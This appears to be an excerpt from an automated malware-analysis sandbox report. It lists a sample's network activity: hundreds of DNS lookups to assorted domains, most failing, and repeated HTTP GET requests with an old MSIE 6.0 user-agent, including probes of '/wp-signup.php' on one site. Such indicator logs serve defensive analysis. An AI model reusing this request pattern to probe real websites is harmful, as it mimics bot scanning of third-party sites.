                  Source: unknownDNS traffic detected: query: www.wkhk.net replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: koz1.net replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: eos-i.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: awfraser.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: iranytu.net replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: www.owsports.ca replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: 89gospel.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: avc.com.sa replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: anteph.org replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: www.ftchat.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: www.vazir.se replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: www.koz1.net replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: agitz.com.br replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: chzko.ru replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: ftchat.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: polprime.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: www.yumgiskor.kz replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: cjcagent.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: awal.ws replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: ktenergo.ru replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: toundo.net replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: cpwpb.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: actmin.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: someikan.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: clysma.com replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: workplus.hu replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: grlawcc.com replaycode: Name error (3)
                  Source: unknownDNS traffic detected: query: htsmx.net replaycode: Server failure (2)
                  Source: unknownDNS traffic detected: query: haigh-me.com replaycode: Name error (3)
                  Source: unknownNetwork traffic detected: DNS query count 438
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.netContent-Length: 5448
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.comCookie: PHPSESSID=c5021e3740c078040485bf529df4f43e
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.comCookie: PHPSESSID=c5021e3740c078040485bf529df4f43e
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.comCookie: PHPSESSID=c5021e3740c078040485bf529df4f43e
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.coCookie: d55e479f054c94814cbc10d217aaa990=2bff9442b12485418e3a501b44a59acc
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                  Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.comCookie: PHPSESSID=c5021e3740c078040485bf529df4f43e
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
